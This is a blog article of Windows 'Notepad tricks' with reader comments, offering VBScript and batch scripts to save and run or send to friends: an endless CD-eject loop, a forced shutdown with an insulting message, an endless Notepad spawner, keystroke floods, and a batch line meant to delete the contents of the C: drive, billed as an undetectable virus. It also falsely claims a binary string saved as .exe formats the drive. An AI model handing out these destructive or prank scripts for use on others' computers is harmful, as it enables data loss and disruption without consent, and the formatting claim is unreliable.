Close Menu
JustwebworldJustwebworld
  • Astrology
  • Business & Finance
    • Cryptocurrency
    • Make Money
    • Entrepreneur
    • Brands
    • Companies
    • Personal Finance
      • Banking
      • Insurance
      • Trading and Investing
  • Tech
    • Computing
    • Cybersecurity
    • Electronics
    • Android
    • Apple
    • Gadgets
    • Social Media
    • Mobile Apps
    • Softwares
  • Education
    • Vocabulary
    • Abbreviations
    • General Knowledge
    • Writing & Translation
  • Lifestyle
    • Beauty & Cosmetics
    • Fashion & Style
    • Furniture & Decor
    • Luxury
    • People & Relationships
    • Pets and Animals
    • Shopping
    • Parenting
    • Gardening
    • Birthdays
  • Health
  • Travel
  • Auto
  • Gaming
  • Food
  • Entertainment
  • Sports
Facebook X (Twitter) Instagram
Saturday, May 24
  • About
  • Contact Us
  • Advertise With Us
  • Disclaimer
  • Terms & Conditions
  • Privacy Policy
JustwebworldJustwebworld
  • Astrology
  • Business & Finance
    • Cryptocurrency
    • Make Money
    • Entrepreneur
    • Brands
    • Companies
    • Personal Finance
      • Banking
      • Insurance
      • Trading and Investing
  • Tech
    • Computing
    • Cybersecurity
    • Electronics
    • Android
    • Apple
    • Gadgets
    • Social Media
    • Mobile Apps
    • Softwares
  • Education
    • Vocabulary
    • Abbreviations
    • General Knowledge
    • Writing & Translation
  • Lifestyle
    • Beauty & Cosmetics
    • Fashion & Style
    • Furniture & Decor
    • Luxury
    • People & Relationships
    • Pets and Animals
    • Shopping
    • Parenting
    • Gardening
    • Birthdays
  • Health
  • Travel
  • Auto
  • Gaming
  • Food
  • Entertainment
  • Sports
JustwebworldJustwebworld
Home»Technology»Computing»Cool Notepad Tricks – Computer Notepad Codes and Commands

Cool Notepad Tricks – Computer Notepad Codes and Commands

Michael AustinBy Michael Austin Computing
Facebook Twitter LinkedIn Telegram Pinterest Reddit Email WhatsApp
Follow Us
WhatsApp Telegram
Share
Facebook Twitter LinkedIn Pinterest Reddit Telegram WhatsApp

Hello Friends, Today On Just Web World, We are going to share some computer notepad tricks and hacks for you! Notepad is a simple text editor for Microsoft Windows OS and a basic text-editing program which enables computer users to create a documents. It has been included in all versions of Microsoft Windows since Windows 1.0 in 1985 to Windows 10.

The best notepad tricks are use for the tricking your Computer with some tricky codes. Here We are sharing notepad tricks codes that will use for something pranks. Here we are showing you top 19 Notepad Tricks, that will really made you crazy.

Table of Contents

Toggle
  • Notepad Tricks and Codes (Notepad CMD Tricks)
    • Funny Computer Notepad Tips, Tricks and Hacks
      • 1) Continually pop out CD Drive Using Notepad:
      • 2) Convey your friend a lil’ message and shut down his / her computer:
      • 3) Open Notepad continually in your friend’s computer:
      • 4) Make A Personal Log-Book or A Diary:
      • 5) Test Your Anti-Virus:
      • 6) Matrix Effect:
      • 7) Constantly Repeat Messages:
      • 8) Toggle Keyboard Button Simultaneously:
      • 9) Type “You are a fool” Continuously:
      • 10) Convert Text Into Audio Using Notepad:
      • 11) Format Your Hard Disk Using Just Notepad !
      • 12) Write your own simple virus cant detected by any antivirus:
      • 13) Notepad Trick to type slowly:
      • 14) How to Change Header and Footer in Notepad:

Notepad Tricks and Codes (Notepad CMD Tricks)

Notepad Tricks and Commands
Cool Notepad Tricks

Funny Computer Notepad Tips, Tricks and Hacks

Table of Contents (TOC)

  • Continually pop out CD Drive Using Notepad
  • Convey your friend a lil’ message and shut down his / her computer
  • Open Notepad continually in your friend’s computer
  • Make A Personal Log-Book or A Diary
  • Test Your Anti-Virus
  • Matrix Effect
  • Constantly Repeat Messages
  • Toggle Keyboard Button Simultaneously
  • Type “You are fool” Continuously
  • Convert Text Into Audio Using Notepad
  • Format Your Hard Disk Using Notepad
  • Write your own simple virus cant detected by any antivirus
  • Notepad Trick to type slowly
  • How to Change Header and Footer in Notepad

1) Continually pop out CD Drive Using Notepad:

Type in Notepad.

Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Also Read: Top Configuration Needs to Consider In Your Custom Gaming PC Top Configuration Needs to Consider In Your Custom Gaming PC

Save it as “AnyName.VBS”.

Like cdvirus.vbs

if you open this file your cd drive continually pop-out.

2) Convey your friend a lil’ message and shut down his / her computer:

Type in Notepad.

@echo off
msg * I don’t like you
shutdown -c “Error! You are stupid!” -s

Save it as “Anyname.BAT”.

Like notepadvirus.bat

3) Open Notepad continually in your friend’s computer:

Type in Notepad.

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as “Anyname.BAT” and send it.

4) Make A Personal Log-Book or A Diary:

Type in Notepad.

.LOG (in capital letters)

Save it as “Anyname.txt”.

Open it again.

When you open the file again you will see the current date and time being inserted automatically after the .LOG line.

This will happen automatically every time you reopen the the notepad file.

5) Test Your Anti-Virus:

You can also test your anti virus program for its effectiveness using a simple notepad trick.

Follow the steps below to know more:

Copy the code give below in the notepad file:

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Save it as “Anyname.exe” like testvirus.exe

As soon as you save this file, your anti virus program will detect the file (virus) immediately and will attempt to delete it. If this happens then your Antivirus is working properly. If not, then its time to look for some other reliable program.

6) Matrix Effect:

Type in Notepad.

Copy the below mentioned text in your notepad file:

Also Read: What You Need To Know Before Switching From Windows to Mac What You Need To Know Before Switching From Windows to Mac

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

Save the file with .bat extension like Matrix.bat

7) Constantly Repeat Messages:

Paste the following code in the notepad file.

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

Save the file with any file name but with .bat as extension and close it. For eg.message.bat

8) Toggle Keyboard Button Simultaneously:

1. Caps Lock Key

Open Notepad.

Paste the following code in the notepad file:

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

Save the file with any name and .vbs extension. and close it.

Now open the newly created file and see how the caps lock key behaves on your keyboard!

9) Type “You are a fool” Continuously:

Open Notepad.

Paste the following code in the notepad file:

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop

Save the file with any name but with .vbs extension and close it.

Open the file and see how it makes you type!

10) Convert Text Into Audio Using Notepad:

Open Notepad.

Copy and paste the below mentioned code.

Dim message, sapi message=InputBox(“Enter your text for conversion–Hacking-world.tk”,”Hover pc Hacks Text-To-Audio Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak message

Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs

Also Read: The Ultimate Guide to Address Lookup: How to Find Anyone’s Address Online The Ultimate Guide to Address Lookup: How to Find Anyone’s Address Online

11) Format Your Hard Disk Using Just Notepad !

Ever wondered of a way to format your hard disk using just notepad ?

Open notepad.

Type the following the code in it (Or just copy paste it).

01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000

Save it as an .exe file giving any name you desire.

That’s It ! Now just double click on the file (to open it) and your C: drive will be formatted !

This is just a little binary fun. Be Careful while using it.

12) Write your own simple virus cant detected by any antivirus:

@Echo off
Del C:\ *.* |y

And save that as .bat RUN IT

It will delete the content of C:\ drive.

Please Note:: don’t run that .bat file on your system… it will delete c: drive.

13) Notepad Trick to type slowly:

Open Notepad.
Paste the following code in the notepad file.

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

Save the file with any name and with .vbs extension and close it.

14) How to Change Header and Footer in Notepad:

Go to File -> Page setup in notepad, and then in the fields for header and footer, type any of these codes.

Also Read: Extract Data From PDF Operator Parameters Extract Data From PDF Operator Parameters

header footer dialog box - notepad tricks

&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number

notepad tricks and tips .bat
funny notepad tricks

How to Make Bootable Pen Drive

How to Remove Shortcut Virus from USB

Whatsapp Tricks

Enjoy Friends these Notepad Tricks Codes, and Please share this Cool Notepad Tricks and Notepad codes with your Friends on social media or use it with your friends and make him a fool !! 😀

Follow on WhatsApp Follow on Telegram
Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Telegram WhatsApp Copy Link
Previous ArticleTop 20 Productivity Apps For Android To Make You More Efficient
Next Article How to Create a New Blog – Useful Tips for Creating a Good Blog
Michael Austin
  • Website
  • Facebook
  • X (Twitter)
  • Pinterest
  • Instagram
  • LinkedIn

Michael Austin is an expert writer who loves creating engaging and easy-to-understand content. With years of experience, he specializes in writing well-researched articles that inform, inspire, and entertain readers. His clear and simple writing style makes complex topics easy to grasp. Whether it's trending news, helpful guides, or expert insights, Michael’s content is designed to be valuable and SEO-friendly, ensuring it reaches the right audience. Stay connected for his latest articles!

Related Posts

Ultimate Guide to CapCut Templates 2025 | Create Viral Reels, TikToks & Shorts with Free Trending Video Edits!

15+ Ghibli AI Image Generator: Top FREE Alternatives to ChatGPT & Grok (Apps & Websites)

Unlocking Boundaries: Best Ways to Access GEO-Restricted Resources

Rotating Datacenter Proxies Vs. Static Proxies: Why Dynamic Rotation Matters

Understanding 127.0.0.1:62893 Meaning, Error and Fixing Tips

127.0.0.1:49342: A Guide To Localhost, Fixing, Working and Solutions

40 Comments

  1. OLIVIA CHILDERS on May 28, 2020 9:10 pm

    AND NOW THURSTON PRESENTS SUNNY BOY AT PLAYTIME MR CONDUCTOR PLAYED WITH HIS BLOCKS DURING PLAYTIME 79. PLAYTIME V.

  2. Rajendra Prasad on January 25, 2020 7:09 pm

    Thanks for sharing such an useful trick of notepad tricks. keep up the good work..

  3. mubarak on October 21, 2019 7:10 am

    very huge its very easily thank you

  4. Technikola on September 19, 2018 1:12 am

    Contunually pop out CD Drive is great prank to try on friend’s PC. Harshil you have written very well. Can we use their device from our home? please share more tricks.You are doing great work keep it up..!!!

  5. Akash on April 3, 2017 11:03 am

    That is very interesting Notepad Tricks, thanks for share this tricks with us. 🙂

  6. Rahul Yadav on March 2, 2017 8:54 pm

    Very good article. Easily explained. I would have never thought these notepad tricks we can do with notepad.

  7. Saurav on February 16, 2017 8:33 pm

    Cool tricks but I know one more which can tell you whether your computer is boy or girl . LOL it was fun to figure out that my computer is female.

  8. Nitin Phogat on December 15, 2016 1:43 pm

    Hi harshil great notepad tricks, from where are you learning these?

  9. Rupender Pal on November 26, 2016 8:36 am

    I am shocked to seen these notepad tricks!

  10. Hemant kumar on August 31, 2016 3:21 pm

    Awesome notepad tricks and tips, I tried all and all are working fine.
    I was Looking for something like this for my readers from so long.
    Thank You for such a great Info 🙂
    Regards,
    Hemant.

  11. Harshil Barot on April 9, 2016 12:18 pm

    Thanks !!

  12. Harshil Barot on April 9, 2016 12:16 pm

    Hello Pankaj !!

    Use this trick to shutdown pc through notepad..

    @echo off
    echo Enter(Y/N)?
    pause
    echo I will shutdown your PC in 5 seconds.
    shutdown -s -t 05

    Note:

    -s : shutdown.
    -r : Restart.
    -l : Logoff.
    -t : Time(After how many seconds should PC turn off).
    -a : aborting the shutdown of PC

    Save the code in .bat format.. 🙂

  13. Pankajsehoriya on March 1, 2016 4:16 pm

    Your notepad tricks are best but tell me the method how to shutdown laptop through notepad.

  14. Harshil Barot on December 10, 2015 10:51 am

    You are Welcome.. Keep Visiting Our Website !!

  15. Harshil Barot on December 10, 2015 10:50 am

    Welcome and stay tuned !! We will update more notepad tricks and tips soon !!

  16. Harshil Barot on December 10, 2015 10:49 am

    Thanks Sanjay 🙂

  17. Harshil Barot on December 10, 2015 10:48 am

    Thanks and Enjoy these best notepad cmd tricks 😉

  18. Harshil Barot on December 10, 2015 10:48 am

    No:9 Tricks is about Type “You are a fool” Continuously !!

  19. Farhamand khan on August 23, 2015 2:21 pm

    No:9 trick only format C drive ??

  20. tad pet on June 16, 2015 12:42 pm

    …lot to say, thank you..

    Best Notepad Tricks you listed and explained very well..

  21. Sanjay choudhary on April 5, 2015 5:09 pm

    finally got a nice informative website || you have really done a good job || carry on
    i have also owner of a blog which deals with tricks and tutorials

  22. hafiz on March 25, 2015 6:11 pm

    Intresting Notepad Tricks thanks 🙂

  23. Krishna on February 17, 2015 11:53 am

    Very good Post…Awesome Notepad Tricks..Thank you for sharing…

  24. Harshil Barot on April 1, 2014 8:07 pm

    Thanks Kiran 🙂

  25. Harshil Barot on April 1, 2014 8:07 pm

    Thanks Shana 🙂

  26. Harshil Barot on April 1, 2014 8:06 pm

    Thanks Shweta 🙂 This Notepad Tricks Will Helps you.

  27. Harshil Barot on April 1, 2014 8:06 pm

    Thanks Jenny I Think This Notepad Tricks will Helps you.

  28. Harshil Barot on April 1, 2014 8:05 pm

    Thanks Basheer

  29. Harshil Barot on April 1, 2014 8:04 pm

    Thanks Rahul 🙂

  30. rahul on March 1, 2014 3:49 pm

    Great ticks, I had no clue about these notepad tricks. Thanks for sharing.

  31. Jenny Parker on June 19, 2013 3:19 pm

    Wow!!! superb tricks!!! thank you for sharing…

  32. Harshil Barot on March 19, 2013 10:00 am

    Thank U..!!

  33. Harshil Barot on March 19, 2013 9:58 am

    Thanks..!!

  34. Shweta Sahitya on March 17, 2013 7:02 pm

    appreaciative work!!!

  35. shana on March 15, 2013 4:06 pm

    soo super

  36. kiran cme on February 17, 2013 8:37 am

    super boss

  37. Harshil Barot on January 2, 2013 8:31 am

    U R also Best…!!

    Believe in Your Self..!!!

  38. Imaran Ansari on January 2, 2013 5:17 am

    nice harshit dear you are best

  39. Harshil Barot on October 22, 2012 4:32 pm

    Thanks Ajay and Al..!!

  40. Ajay on August 19, 2012 6:25 am

    nice collection keep it up

Leave A Reply

Categories
Archives

Seeing 808 Everywhere? Angel Number 808 Meaning, Love, Career & Destiny Explained

FC Goa: Indian Super League Powerhouse | Players, Records & Titles

Tesla Model Y 2025 Review: Price, Range, Specs & Features | America’s Top Electric SUV

Sasha Montenegro: Mexican Cinema Icon | Biography, Movies, Husband, Life & Legacy

The Price of Keeping Financial Secrets in a Marriage

Latest Anime Saga Codes (May 2025) – Redeem Free Rewards | Before They Expire!

Jose Alvarado NBA 2025: Inspiring Journey, Impressive Stats, Big Contract & Puerto Rico Pride

Who is Hazel Brugger? Top Swiss Comedian, Eurovision Host & Comedy Queen of Europe

Luke Kornet Full Player Profile | Age, Height, Net Worth, Career Stats 2025

Who Is Brent Faiyaz? Age, Songs, Albums, Net Worth & Tour 2025

DMCA.com Protection Status
Quick Links
Age Calculator
Angel Number Calculator
Case Converter
Sudoku Online
Word Counter
Love Calculator
Useful Links
Number to Words
Period Calculator
Yes-No Picker Wheel
Demon Name Generator
Kingdom Name Generator
Harry Potter Name Generator
Helpful Resources
Colors Name In English
Best Computer Brands
WhatsApp Web
Most Beautiful Beaches
Tesla Cybertruck Review
Richest Actors in the World
Explore More
Good Morning Handsome
Best English Songs of All Time
Cricket World Cup Winners
Ways to Say Rest In Peace
Britain’s Got Talent Winners
American Idol Winners
Facebook X (Twitter) Instagram Pinterest YouTube Tumblr LinkedIn WhatsApp Telegram Threads RSS
  • About
  • Contact Us
  • Advertise With Us
  • Disclaimer
  • Privacy Policy
  • Terms & Conditions
  • Web Stories
Copyright © 2012-2025. JustWebWorld - All Rights Reserved. | Sitemap

Type above and press Enter to search. Press Esc to cancel.

×

👇 Bonus Reads for You 🎁

System Service Exception
Fix System Service Exception Windows 10 Error
Erase or Wipe a Hard Disk
How to Wipe a Hard Drive With SafeWiper for Disk
Designing an Engaging Pie Chart Template
Create Stunning Pie Chart Templates to Visualize Data Effectively
Best Creative Video Editor With Video Editing Tools
Tips On Becoming The Best Creative Video Editor With Video Editing Tools